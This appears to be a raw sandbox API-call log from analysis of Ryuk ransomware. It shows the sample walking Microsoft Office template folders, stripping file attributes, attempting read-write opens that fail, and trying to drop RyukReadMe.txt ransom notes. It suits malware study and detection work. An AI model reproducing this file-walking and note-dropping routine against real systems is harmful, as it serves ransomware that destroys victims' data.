1 [0138.174] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.174] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeFax.Dotx", dwFileAttributes=0x80) returned 0 [0138.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielmergefax.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.175] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.175] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.175] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.175] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.175] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeLetter.Dotx", dwFileAttributes=0x80) returned 0 [0138.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielmergeletter.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.175] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.175] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.175] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.175] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielReport.Dotx", dwFileAttributes=0x80) returned 0 [0138.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielreport.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.176] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.176] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.176] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.176] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielResume.Dotx", dwFileAttributes=0x80) returned 0 [0138.176] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielresume.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.176] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.176] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.177] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.177] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.177] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginLetter.Dotx", dwFileAttributes=0x80) returned 0 [0138.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originletter.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.177] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.178] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.178] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeFax.Dotx", dwFileAttributes=0x80) returned 0 [0138.178] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originmergefax.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.178] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.178] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.178] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.178] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeLetter.Dotx", dwFileAttributes=0x80) returned 0 [0138.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originmergeletter.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.179] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.179] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.179] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.179] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.179] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginReport.Dotx", dwFileAttributes=0x80) returned 0 [0138.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originreport.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.179] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.179] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.179] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.179] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginResume.Dotx", dwFileAttributes=0x80) returned 0 [0138.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OriginResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\originresume.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.180] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.180] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.180] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.180] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.180] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PersonalMonthlyBudget.xltx", dwFileAttributes=0x80) returned 0 [0138.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PersonalMonthlyBudget.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\personalmonthlybudget.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.180] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.180] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.181] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.181] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Pitchbook.potx", dwFileAttributes=0x80) returned 0 [0138.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Pitchbook.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\pitchbook.potx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.181] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.181] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.181] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.181] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ProjectStatusReport.potx", dwFileAttributes=0x80) returned 0 [0138.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ProjectStatusReport.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\projectstatusreport.potx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.182] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.182] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.182] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.182] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.182] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PROJPLAN.XLTX", dwFileAttributes=0x80) returned 0 [0138.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\PROJPLAN.XLTX" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\projplan.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.186] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.186] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.186] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.186] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\QuizShow.potx", dwFileAttributes=0x80) returned 0 [0138.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\QuizShow.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\quizshow.potx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.187] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.187] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.187] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.187] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\SalesReport.xltx", dwFileAttributes=0x80) returned 0 [0138.187] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\SalesReport.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\salesreport.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.187] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.188] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.188] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.188] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TASKLIST.XLTX", dwFileAttributes=0x80) returned 0 [0138.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TASKLIST.XLTX" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\tasklist.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.189] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.189] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.189] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.189] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.189] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TimeCard.xltx", dwFileAttributes=0x80) returned 0 [0138.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\TimeCard.xltx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\timecard.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.189] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.189] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.189] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.189] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.190] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanLetter.Dotx", dwFileAttributes=0x80) returned 0 [0138.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanletter.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.190] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.190] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.190] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.190] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.190] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeFax.Dotx", dwFileAttributes=0x80) returned 0 [0138.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeFax.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanmergefax.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.190] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.191] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.191] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeLetter.Dotx", dwFileAttributes=0x80) returned 0 [0138.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanMergeLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanmergeletter.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.191] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.191] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.191] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.191] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanPhotoAlbum.potx", dwFileAttributes=0x80) returned 0 [0138.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanPhotoAlbum.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanphotoalbum.potx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.192] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.192] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.192] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.192] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanReport.Dotx", dwFileAttributes=0x80) returned 0 [0138.192] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanReport.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanreport.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.192] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.192] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.192] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.192] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanResume.Dotx", dwFileAttributes=0x80) returned 0 [0138.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\UrbanResume.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\urbanresume.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.193] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.193] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.193] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.193] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.193] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\WidescreenPresentation.potx", dwFileAttributes=0x80) returned 0 [0138.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\WidescreenPresentation.potx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\widescreenpresentation.potx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.194] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.194] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.194] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.194] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.194] SetLastError (dwErrCode=0x0) [0138.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.194] GetLastError () returned 0x5 [0138.194] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.194] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.194] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.194] SetLastError (dwErrCode=0x0) [0138.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.195] GetLastError () returned 0x5 [0138.195] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.195] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.195] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d60 [0138.195] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.195] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.195] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Maple.gif", dwFileAttributes=0x80) returned 0 [0138.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\Maple.gif" (normalized: "c:\\program files\\microsoft office\\templates\\presentation designs\\maple.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.195] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.195] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.196] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.196] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.196] SetLastError (dwErrCode=0x0) [0138.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\Presentation Designs\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\presentation designs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.196] GetLastError () returned 0x5 [0138.196] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.196] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.196] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0138.196] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.196] SetLastError (dwErrCode=0x0) [0138.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.196] GetLastError () returned 0x5 [0138.196] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.196] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.196] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0138.196] FindClose (in: hFindFile=0x3c3ef0 | out: hFindFile=0x3c3ef0) returned 1 [0138.196] SetLastError (dwErrCode=0x0) [0138.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.196] GetLastError () returned 0x5 